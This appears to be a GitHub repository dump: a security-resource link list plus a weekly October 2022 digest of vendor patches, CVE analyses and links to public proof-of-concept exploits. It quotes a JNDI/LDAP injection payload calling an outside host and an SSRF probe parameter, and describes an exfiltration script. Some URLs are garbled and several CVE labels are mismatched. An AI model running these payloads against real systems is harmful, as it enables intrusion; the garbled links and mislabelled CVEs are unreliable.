- [Awesome Pentesting](https://github.com/enaqx/awesome-pentest/blob/master/README.md)
- [Devbreak on Twitter](https://twitter.com/DevbreakFR)
- [The Life of a Security Researcher](https://www.alienvault.com/blogs/security-essentials/the-life-of-a-spotity-researcher)
- [Find an awesome hacking spot in your country](https://github.com/diasdavid/awesome-hacking-spots)
- [Awesome-Hacking Lists](https://github.com/Hack-with-Github/Awesome-Hacking/blob/master/README.md)
- [Crack Station](http://crackstation.net/)
- [Exploit Database](http://www.exploit-db.com/)
- [Hackavision](http://www.hackavision.com/)
- [Hackmethod](https://www.hackmethod.com/)
- [Packet Storm Security](http://packetstormsecurity.org/)
- [SecLists](http://seclists.org/)
- [SecTools](http://sectools.org/)
- [Smash the Stack](http://smashthestack.org/)
- [Don't use VPN services](https://gist.github.com/joepie91/5a9909939e6ce7d09e29)
- [How to Avoid Becoming a Script Kiddie](https://www.wikihow.com/Avoid-Becoming-a-Script-Kiddie)
- [2017 Top 10 Application Security Risks](https://www.owasp.org/index.php/Top_10-2017_Top_10)
- [Starting in cybersecurity ?](https://blog.0day.rocks/starting-in-cybersecurity-5b02d827fb54)
([Table of Contents](#table-of-contents))
# License
This repository is under MIT license.
([Table of Contents](#table-of-contents))
================================================
FILE: ResetCybersecuirty/CONTRIBUTING.md
================================================
# Contribution Guidelines
Please note that this project is released with a **No Code or Low Code contribution**.
Contributing to open source isn’t just for technical folks who want to write code. There are lots of opportunities to use your professional skills in support of open-source projects. ResetHacker Community making a point to encourage contributions that require some technical experience or none at all. No matter your experience, you can Join and contribute in ResetHacker!
RESETHACKER welcomes people of any experience level to participate,Join, create and low-code and non-code contributions are fantastic choices for folks who don’t have a lot of technical knowledge. Here are some examples of ways you can contribute to open-source projects:
| Writing | Technical documentation | Translating & Copy editing |
| | Topics | Low code | Non-Code |
| ----------- |-------------------------|----------|----------------|
| 1. | **Writing** | `Technical documentation` | Translating & Copy editing. |
| 2. | **Design** | `Testing` | User experience testing, Graphic design and Video production. |
| 3. | **Advocacy** | `Talks or presentations, Technical blog posts, Podcast & Case studies` | Social media & Blog posts. |
## Contributors submitting low-code or no-code content by Submitting a pull request
<br>
- Fork this repository
- Clone this repository
- Add or Make the changes
- Add your name & github link to [Contributors](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Contributors.md)
- Wait for your pull request to be reviewed and merged!
## Updating your Pull Request
Sometimes, a maintainer of an ResetHacker community will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the ResetHacker guidelines.
================================================
FILE: ResetCybersecuirty/CVE's/CVE_Assests/Beta.md
================================================
# Security Patched, CVE : poc, analysis and Exploit.
<p align=""> <img src="https://komarev.com/ghpvc/?username=RESETHACKER-COMMUNITY&label=Profile%20views&color=ce9927&style=flat" alt="/Pentesting-Bugbounty//ResetCybersecuirty/CVE's/Readme.md" /> </p>
<details>
<summary><b>
A collection on latest proof-of-concept exploit scripts and analysis of latest patched CVE.
> Why you ask becuase There are tens of thousands of vulnerabilities disclosed each year. Only a handful of them will ever be exploited and this will makes you and your organization vulnerable with latest vulnerabilities.
- Every Week our team filter out latest IT security CVEs POC, update on patchted security, writeups & analysis of cve that has been discovered, written or found by community members. Format we follow :
</b></summary>
# Security Patched within a Week: Latest IT security vulnerability patched within this week on selected company such as Apple, Google, :
# CVE Analysis: CVE analysis and poc for analysis.
# Poc Exploit : Tracking the recetly discovered PoC of old & new CVE.
- [CVE]
- Target/Product: ** **
- Affected Version/ Patched :
- Discription/Issue/Flaw :
</details>
---
## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 19th October-25th October 2022.
Security Patched within a Week: Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022).
featuring releases from Morzilla, Microsoft, Jenkins, Github, Cisco, Linux(Ubuntu 22.4,20.4& 18.4 LTE) etc.
CVE:ANALYSIS & POC: CVE-2022-40684, Zimbra 0Day CVE 2022-41352 , CVE-2022-42889/ Text4Shell, CVE-2022-37969
CVE-2022-3236 & CVE-2022-36966.
CVE POC (0-Day): 7-ZipPostExploit, CVE-2022-21970, CVE-2022-41040-metasploit-ProxyNotShell, CVE-2022-22947, Sploits,
CVE-2022-42045, CVE-2022-36663, CVE-2022-3368, CVE-2022-27502, CVE-2022-23131, CVE-2021-46422(google crome).
<details>
<summary>
Security Patched within a Week:
> We track the latest Security Advisories of top vendors and filter out high and critical vulnerability that has been patched within a week.
</summary>
- *Here’s a look at the Latest Security (Severity : Critical or High) that has been patched from Top vendors in last Week and If you're using any of the old version of mentioned vendors then avoid getting tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit so we will highly recommend **upgrading or updating of vendor products from the origional source.***
- **Morzilla security Advisories** :
- Mozilla has released security updates to address vulnerabilities in *Firefox ESR 102.4* and *Firefox 106*. An attacker could exploit these vulnerabilities to cause denial-of-service conditions.
- **Jenkins security Advisories** :
- This Week Jenkins announces [vulnerabilities in the multiple Jenkins deliverables](https://www.jenkins.io/security/advisory/2022-10-19/). Our advice will be to follow the advise and update Affected plugins.
- **[Cisco security Advisories](https://tools.cisco.com/security/center/publicationListing.x)** :
- Cisco has released security update for vulnerabilities affecting Cisco Identity Services Engine (ISE). A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
- **Github security Advisories** :
- [Dataease Mysql Data Source JDBC Connection Parameters Not Verified Leads to Deserialization Vulnerability](https://github.com/dataease/dataease/security/advisories/GHSA-q4qq-jhjv-7rh2)
- [run-terraform allows for RCE via terraform plan ](https://github.com/kartverket/github-workflows/security/advisories/GHSA-f9qj-7gh3-mhj4)
- [Team scope authorization bypass when Post/Put request with :team_name in body, allows HTTP parameter pollution](https://github.com/concourse/concourse/security/advisories/GHSA-5jp2-vwrj-99rf)
- Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages. we highly recomend updating & upgrading these Pakages.
- **Ubuntu 22.04** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl - Practical Extraction and Report Language,libksba - X.509 and CMS support library,git, frr - FRRouting suite of internet protocols, zlib - Lossless data-compression library,
- **Ubuntu 20.04 LTS** : libreoffice,libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl - Practical Extraction and Report Language, libksba - X.509 and CMS support library, git, zlib - Lossless data-compression library.
- **Ubuntu 18.04 LTS** : libreoffice, linux-oem-5.17, linux - Linux kernel, linux-aws,,linux-aws-5.15,linux-azure ,linux-azure-5.15,linux-gcp,linux-gcp-5.15,linux-gke ,linux-gke-5.15 ,linux-gkeop ,linux-hwe-5.15,linux-ibm ,linux-kvm ,linux-lowlatency,linux-lowlatency-hwe-5.15,linux-oem-5.14 ,linux-oracle ,linux-raspi, perl, libksba - X.509 and CMS support library, linux-azure-4.15, git.
- **Microsoft**
- Microsoft have released security advisory to provide information about a vulnerability exists in .NET 6.0, .NET 5.0 and .NET Core 3.1. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
- https://github.com/dotnet/runtime/security/advisories/GHSA-485p-mrj5-8w2v
- https://github.com/dotnet/aspnetcore/security/advisories/GHSA-cw98-9j8w-wxv9
- https://github.com/dotnet/aspnetcore/security/advisories/GHSA-x459-p2rx-f8ff
- https://github.com/dotnet/runtime/security/advisories/GHSA-vgwq-hfqc-58wv
- https://github.com/dotnet/runtime/security/advisories/GHSA-c6w8-7mp3-34j9
- **CISA Advisories**
> CISA has released three (3) Industrial Control Systems (ICS) advisories on October 20, 2022. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
• ICSA-22-293-01 [Bentley Systems MicroStation Connect](https://www.cisa.gov/uscert/ics/advisories/icsa-22-293-01)
• ICSMA-21-294-01 [B Braun Infusomat Space Large Volume Pump (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-21-294-01)
• ICSMA-20-296-02 [B. Braun SpaceCom Battery Pack SP with Wi-Fi and Data module compactplus (Update A)](https://www.cisa.gov/uscert/ics/advisories/icsma-20-296-02)
</details>
<details>
<summary>
CVE Analysis, writeups & reports: (6 CVE analysis in Last 1 Week)
> Every week, we collect the recetly discovered Writeups & reports for CVE.
</summary>
- [Analysis: CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZVtechnical-deep-dive-cve-2022-40684/)
- [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)
- [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)
- [Detection for SOC](https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/)
- [Fortinet devices possibly vulnerable to CVE-2022-40684 on Netlas.io](https://app.netlas.io/responses/?q=tag.name%3A(fortinet%20OR%20fortigate_vpn)&page=1&indices=)
- Vendor : **Fortinet FortiGate**
- Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0
- Patched : Apply updates per vendor instructions.
- Discription : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
- [Analysis : Exploitation of Zimbra 0Day CVE 2022-41352 ](https://securelist.com/ongoing-exploitation-of-cve-2022-41352-zimbra-0-day/107703/)
- Target/Product: **Zimbra**
- Discription/Issue/Flaw : The vulnerability affects a component of the Zimbra suite called Amavis, and more specifically the cpio utility it uses to extract archives. The underlying cause is another vulnerability (CVE-2015-1197) in cpio, for which a fix is available. Inexplicably, distribution maintainers appear to have reverted the patch and use a vulnerable version instead. This creates a large attack surface where any software relying on cpio might in theory be leveraged to take over the system. CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.
- [Analysis : CVE-2022-41852](https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/)
- [PoC CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)
- Payload : [jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");]
- Target : **Apache Commons Jxpath**
- Discription : This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability.
- [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)
- [Analysis:Log4J-scan update: Detection for Apache Commons Text RCE (CVE-2022-42889)](https://fullhunt.io/blog/2022/10/20/apache-commons-text-rce.html)
- [OSS patcher for CVE-2022-42889 - Finds and closes the vulnerability on deployed JAR files](https://github.com/jfrog/text4shell-tools/tree/main/text_4_shell_patch)
- [Tool : CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/text4shell-tools)
- [Tool BLOG : for Text4Shell](https://blog.silentsignal.eu/2022/10/18/our-new-scanner-for-text4shell/)
- Target/Product: **Apache Common Text** is a software component used to manipulate character strings, published by the Apache Foundation .
- Solution : Upgrade to Apache Commons Text 1.10.0.
- Discription/Issue/Flaw : CVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list . This vulnerability closely resembles the Log4Shell CVE series , and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another , or to construct messages from a preconfigured format.
- [Analysis : Windows CLFS Zero-Day Vulnerability CVE-2022-37969 and Part 1 Root Cause Analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part)
- Target/Product: **Microsoft**
- Discription/Issue/Flaw : CVE-2022-42889 Text4Shell: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is due to the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bound write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969.
- [Analysis : CVE-2022-3236: Sophos Firewall User Portal and Web Admin Code Injection](https://www.zerodayinitiative.com/blog/2022/10/19/cve-2022-3236-sophos-firewall-user-portal-and-web-admin-code-injection)
- Target/Product: **SOPHOS**
- Discription/Issue/Flaw : In this excerpt of a Trend Micro Vulnerability Research Service vulnerability report, Guy Lederfein and Dusan Stevanovic of the Trend Micro Research Team detail a recently patched code injection vulnerability in the Sophos Firewall. The bug is due to improper validation of JSON keys submitted in the “JSON” parameter sent to the Controller endpoint. Successful exploitation of this vulnerability could result in remote code execution with the privileges of the root user. The following is a portion of their write-up covering CVE-2022-3236, with a few minimal modifications.
- [Analysis : IDOR Vulnerability: SolarWinds Platform 2022.3 (CVE-2022-36966).](https://www.solarwinds.com/trust-center/security-advisories/cve-2022-36966)
- Target/Product: **SolarWinds Platform 2022.3.**
- Affected Cersion : Solarwind <= v2022.3 and Orion Platform <= 2020.2.6 HF5 .
- Discription/Issue/Flaw : Users with Node Management rights were able to view and edit all nodes due to Insufficient control on URL parameter causing insecure direct object reference (IDOR) vulnerability in SolarWinds Platform 2022.3.
</details>
<details>
<summary> PoC for CVE & Exploit (Total : 12 new 0-day in last week) :
> Every week we're tracking the recetly discovered Exploit and PoC for CVE.
</summary>
- [PoC CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)
- Target/Product: **Zemana amsdk.sys kernel-mode driver**
- Affected Version: Watchdog Anti-Malware 4.1.422 , Zemana AntiMalware 3.2.28, Zemana AntiLogger v2.74.2.664.
- Discription : We discovered an Arbitrary code injection in Zemana amsdk.sys kernel-mode driver, a part of Zemana Antimalware SDK. The vulnerability allows to inject an arbitrary code into the one of the driver code sections and then to execute it with kernel-mode privileges (local privileges escalation from admin to kernel mode). This vulnerability could be used, for example, to disable Driver Signature Enforcement and then to install unsigned kernel-mode drivers.
- [Poc CVE-2022-36663-PoC](https://github.com/Qeisi/CVE-2022-36663-PoC)
- Target/Product: **Gluu**
- Affected Version: < v4.4.1
- Title : Internal network scanner through Gluu IAM blind ssrf.
- Discription : Gluu IAM is vulnerable to blind SSRF which can be exploited to scan the internal network for open ports depending on response times. To check if the target is vulnerable, add &request_uri=http://burpcollab to the /oxauth/restv1/authorize request and poll for incoming traffic from the target server.
- [Poc CVE-2021-46422](https://github.com/Awei507/CVE-2021-46422)
- Target/Product: **Google Chrome**
- Affected Version: Poc maker calims "All" but CVE says version < 80.0.3987.149
- Solution : google-chrome-upgrade-latest
- Discription : Use after free in WebGL in Google Chrome prior to 80.0.3987.149 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
- [PoC CVE-2022-21970](https://github.com/Malwareman007/CVE-2022-21970)
- Target/Product: **Microsoft Edge**
- Affected Version: < 97.0.1072.62
- Discription : Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This vulnerability allows an attacker to execute javascript code on every host without permission, also an attacker can steal local system files, and also he can manipulate the actions against the machine and result in changing internal developer settings in Microsoft Edge.
- [CVE-2022-41040 Metasploit ProxyNotShell](https://github.com/TaroballzChen/CVE-2022-41040-metasploit-ProxyNotShell)
- Target/Product: **MS Exchange**
- Discription : The metasploit script(POC) about CVE-2022-41040. Microsoft Exchange are vulnerable to a server-side request forgery (SSRF) attack. An authenticated attacker can use the vulnerability to elevate privileges.
- [CVE-2022-22947](https://github.com/crowsec-edtech/CVE-2022-22947)
- Target/Product: **Spring Cloud Gateway**
- Affected Version: Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE)
- Discription : Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
- [7-Zip PostExploit](https://github.com/Qeisi/7-ZipPostExp)
- Target/Product: **7-Zip**
- Affected Version: Tested on Version 19.00
- Discription : 7-ZipPostExploit is a Post-Exploitation script to exfiltrate 7-zip files(Tested on Version 19.00, the attacker has access to plaintext documents). PoC for exfiltrating sensitive data encrypted by 7-zip to an external attacker server. This is done in the post exploitation phase
- [CVE-2022-41040](https://github.com/kljunowsky/CVE-2022-41040-POC)
- Target/Product: **Microsoft Exchage Server**
- Discription : PoC for Microsoft CVE-2022-41040 - Server Side Request Forgery (SSRF) in Microsoft Exchange Server.
- [Zeroday Microsoft Exchange Server checker (Virtual Patching checker)](https://github.com/VNCERT-CC/0dayex-checker)
- [PoC CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368)
- Target/Product: **Avira**
- Affected version ; "Avira Security" – for Windows version < 1.1.71.30554
- Discription/Issue/Flaw : PoC for arbitrary file move vulnerability in Software Update component of Avira Security. Users have option to use this feature to update any outdated software on their PC ,when this feature is used Avira Security service will drop downloaded files in c:\ProgramData\Avira\Security\Temp. First file that is created in subdirectory is in format <random 4 numbers>_<filename> then later this file is moved to just <filename> (leading numbers and underscore are removed).This directory have DACL's that dont allow unprivileged users to modify/delete newly created files but it will allow user to create junction. This can abused by creating junction point to user controlled directory which have more permissive DACL's , this way when new files are created in subdirectories user will be able to modify them and leverage it to obtain arbitrary file move which leads to LPE by writing dll in system32 directory that is later loaded by privileged service. Current PoC will load dll in windows update service, dll dont implement any kind of mutex to check if exploit was already executed which result in creating multiple cmd.exe process as dll is loaded multiple times.
- [CVE-2022-27502](https://github.com/Mr-xn/cve-2022-23131)
- Target/Product: **Zabbix**
- Discription : Zabbix Unsafe Session Storage.
- [Sploits](https://github.com/3sjay/sploits)
- Target/Product: **aukey**
- Discription : aukey-wr-01-RCE-0day.
- [CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502)
- Target/Product: **RealVNC server**
- Affected Version: aukey wr-r01 ROUTER 0day
- Discription : RealVNC server up to 6.9.0 DLL Hijacking Exploit.
</details>
---
Have a good Weekend#12
---
## CVE's that matter : [Weekly Infosec Update](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/) -> 12th October-18th October 2022.
Security Patched within a Week: Latest vulnerability that has been patched within last two week (12th Oct - 18th October 2022).
featuring releases from Apple, Microsoft, Adove, Github, google, Linux(Ubuntu, kali etc), etc.
CVE:ANALYSIS & POC: Poc for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell
and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020
CVE POC (0-Day): CVE-2021-46422(google crome), CVE-2022-41852, CVE-2021-45067, Poc for CVE-2022-40684 & Nuclei template,
CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit,
<details>
<summary>
Security Patched within a Week:
> We track the latest Security advisery of top vendors and filter out high and critical vulnerability that has been patched within a week.
</summary>
- *Here’s a look at the Latest Security (Severity : Critical or High) that has been patched from Top vendors in last 2 Week(12th Oct - 18th October 2022) and If you're using any of the old version of mentioned vendors then avoid getting tricked into opening a specially crafted website in a browsing context, an attacker could potentially exploit so we will highly recommend **upgrading or updating of vendor products from the origional source.***
- **Apple security advisery** :
- A vulnerability(CVE-2022-22658) was found in Apple iOS up to 16.0.2 (Smartphone Operating System}. This issue affects some unknown processing of the component Email Handler. The manipulation with an unknown input leads to a denial of service vulnerability.
- **Google security advisery** :
- This Week google had released the advisety with [pixel](https://source.android.com/docs/security/bulletin/pixel/2022-10-01), [Android Automotive OS Update](https://source.android.com/docs/security/bulletin/aaos/2022-10-01) and Android](https://source.android.com/docs/security/bulletin/2022-10-01). Our advice willl be update these products.
- **Adove security advisery** :
- Adobe has released security update to address multiple vulnerabilities in Adobe software (Cold Fusion, Acrobat and Reader,Adobe Commerce and Magneto Open Source, Dimension). An attacker can exploit some of these vulnerabilities to take control of an affected system.
- **Github security advisery** :
- The rubygem sqlite3 v1.5.1 upgrades the packaged version of libsqlite from v3.39.3 to v3.39.4.
- [aws/amazon-redshift-jdbc-driver](https://github.com/aws/amazon-redshift-jdbc-driver/security/advisories/GHSA-jc69-hjw2-fm86) : A potential remote command execution issue exists within redshift-jdbc42 versions 2.1.0.7 and below.
- Several security issues were fixed in the different version of **Ubuntu** Linux kernel pakages. we highly recomend updating & upgrading these Pakages.
- **Ubuntu 22.04** : thunderbird, kitty, isc-dhcp - DHCP server and client, python-django - High-level Python web development framework, strongswan - IPsec VPN solutio etc.
- **Ubuntu 20.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-ibm - Linux kernel for IBM cloud systems, LibreOffice, kitty, gthumb - image viewer and browser, dotnet6 - dotNET CLI tools and runtime,linux - Linux kernel,linux-aws - Linux kernel for Amazon Web Services (AWS) systems,linux-bluefield - Linux kernel for NVIDIA BlueField platforms,linux-gke - Linux kernel for Google Container Engine (GKE) systems,linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel,linux-ibm - Linux kernel for IBM cloud systems,linux-ibm-5.4 - Linux kernel for IBM cloud systems,linux-kvm - Linux kernel for cloud environments,linux-oracle - Linux kernel for Oracle Cloud systems
- **Ubuntu 18.04 LTS** : unzip - De-archiver for .zip files, gmp - Multiprecision arithmetic library developers tools, heimdal - Heimdal Kerberos Network Authentication Protocol, linux-aws-5.4 - Linux kernel for Amazon Web Services (AWS) systems, linux-aws - Linux kernel for Amazon Web Services (AWS) systems, linux-gcp-4.15 - Linux kernel for Google Cloud Platform (GCP) systems, advancecomp - collection of recompression utilities,linux - Linux kernel,linux-aws - Linux kernel for Amazon Web Services (AWS) systems,linux-bluefield - Linux kernel for NVIDIA BlueField platforms,linux-gke - Linux kernel for Google Container Engine (GKE) systems,linux-gkeop - Linux kernel for Google Container Engine (GKE) systems, linux-hwe-5.4 - Linux hardware enablement (HWE) kernel,linux-ibm - Linux kernel for IBM cloud systems,linux-ibm-5.4 - Linux kernel for IBM cloud systems,linux-kvm - Linux kernel for cloud environments,linux-oracle - Linux kernel for Oracle Cloud systems.
- **Microsoft**
- [Weakness in Microsoft Office 365 Message Encryption could expose email contents](https://www.helpnetsecurity.com/2022/10/14/weakness-office-365-encryption/)
- Microsoft has released updates to address multiple vulnerabilities in Microsoft software. An attacker can exploit some of these vulnerabilities to take control of an affected system.[Theres has been 55+ security that has been fixed in Microsoft products, pakage & application](https://msrc.microsoft.com/update-guide/releaseNote/2022-Oct) such as Edge (Chromium-based), Microsoft Graphics Component, Microsoft Office : Word, SharePoint, Role: Windows Hyper-V, Visual Studio Code, Microsoft WDAC OLE DB provider for SQL, NuGet Client, Remote Access Service Point-to-Point Tunneling Protocol, Active Directory Domain Services etc
</details>
<details>
<summary>
CVE Analysis, writeups & reports: (7 analysis that matter in Last 1 Week)
> Every week, we collect the recetly discovered Writeups & reports for CVE.
</summary>
- [Analysis: CVE-2022-8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/)
- [POC CVE-2022-40684](https://github.com/horizon3ai/CVE-2022-40684)
- [Nuclei template CVE-2022-4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRyFTLRNyDmT1a1boZV40684.yaml)
- [Added module for CVE-2022-40684 in Metasploit framework](https://github.com/rapid7/metasploit-framework/pull/17143)
- Vendor : **Fortinet**
- Affected : FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0
- Patched : Apply updates per vendor instructions.
- Discription : An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS , FortiProxy and FortiSwitchManager allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
- [Analysis:CVE-2022-41033](https://www.helpnetsecurity.com/2022/10/11/cve-2022-41033/)
- Vendor : **Microsoft Products**
- Affected : All versions of Windows starting with Windows 7 and Windows Server 2008 are vulnerable.
- Patched : Apply updates per vendor instructions.
- Discription : Microsoft Windows COM+ Event System Service contains an unspecified vulnerability that allows for privilege escalation.This vulnerability is considered to have a low attack complexity. It has an exploitability score of 1.8 out of four. The potential impact of an exploit of this vulnerability is considered to be very high.
- [Analysis : CVE-2021-45067](https://hacksys.io/blogs/adobe-reader-xfa-ansi-unicode-confusion-information-leak)
- [PoC : CVE-2022-36067](https://github.com/hacksysteam/CVE-2021-45067)
- Target/Product: **[Acrobat Reader DC](https://get.adobe.com/reader/otherversions/)**
- Affected Version : 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier)).
- Discription/Issue/Flaw : Out of Bounds Read caused by treating ANSI string as Unicode in Acrobat Reader DC versions. This vulnerability can be exploited to leak sensitive information from the sandboxed adobe reader process.
- [Analysis : CVE-2022-36067](https://github.com/patriksimek/vm2/security/advisories/GHSA-mrgp-mrhc-5jrq)
- Title : [Critical vm2 sandbox escape flaw uncovered, patch ASAP!](https://www.helpnetsecurity.com/2022/10/10/cve-2022-36067/)
- Target : **vm2 Javascript sandbox library**
- Affected : version < 3.9.11
- Discription : Oxeye researchers discovered a severe vm2 vulnerability (CVE-2022-36067) that has received the maximum CVSS score of 10.0. Called SandBreak, this new vulnerability requires R&D leaders, AppSec engineers, and security professionals to ensure they immediately patch the vm2 sandbox if they use it in their applications. A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
- [Analysis : CVE-2022-42889/ Text4Shell](https://cyberwatch-fr.translate.goog/cve/cve-2022-42889-text4shell-comment-detecter-et-corriger-cette-vulnerabilite-sur-apache-commons-text/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-GB)
- Target/Product: **Apache Common Text** is a software component used to manipulate character strings, published by the Apache Foundation .
- Discription/Issue/Flaw :
CVE-2022-42889 Text4Shell: A remote code execution vulnerability in Apache Commons Text software On October 13, 2022, the Apache Foundation published a vulnerability in the code of the Apache Commons Text project and posted a message to this effect in the project's mailing list . This vulnerability closely resembles the Log4Shell CVE series , and is referenced as CVE-2022-42889. Apache Commons Text is used to check if one string contains another , or to construct messages from a preconfigured format.
- [Analysis : Windows CLFS Zero-Day Vulnerability [CVE-2022-37969](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969) Part 1: Root Cause Analysi](https://www.zscaler.com/blogs/security-research/technical-analysis-windows-clfs-zero-day-vulnerability-cve-2022-37969-part)s
- Target/Product: **Microsoft**
- Discription/Issue/Flaw :
CVE-2022-42889 Text4Shell: An attacker who successfully exploits this vulnerability may gain SYSTEM privileges. The 0-day exploit can execute the privilege escalation successfully on Windows 10 and Windows 11 prior to the September patch. The cause of the vulnerability is due to the lack of a strict bounds check on the field cbSymbolZone in the Base Record Header for the base log file (BLF) in CLFS.sys. If the field cbSymbolZone is set to an invalid offset, an out-of-bound write will occur at the invalid offset. In this two-part blog series, we will demystify the vulnerability and the 0-day exploit discovered in-the-wild. The blogs consist of two parts: an analysis of the root cause, and an analysis of the exploit. In this blog, we first present a detailed analysis of the root cause for CVE-2022-37969
- [Detailed Report of Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF)
- Summary :-> [Top CVEs most used by Chinese state-sponsored cyber actors since 2020](https://www.cisa.gov/uscert/ncas/alerts/aa22-279a)
- Affected Vendors :
<img src="https://user-images.githubusercontent.com/25515871/195232896-65a359b5-91b4-4dbf-ae64-05b4e8ff3a82.jpg" width="500" height="450">
- Discription: US authorities (NSA, FBI, CISA) expose the TOP 20 vulnerabilities actively exploited by Chinese state-sponsored attackers and NSA, CISA, and FBI urge organizations to apply the recommendations below
- Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.
- Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised.
- Block obsolete or unused protocols at the network edge.
- Upgrade or replace end-of-life devices.
- Move toward the Zero Trust security model.
- Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.
</details>
<details>
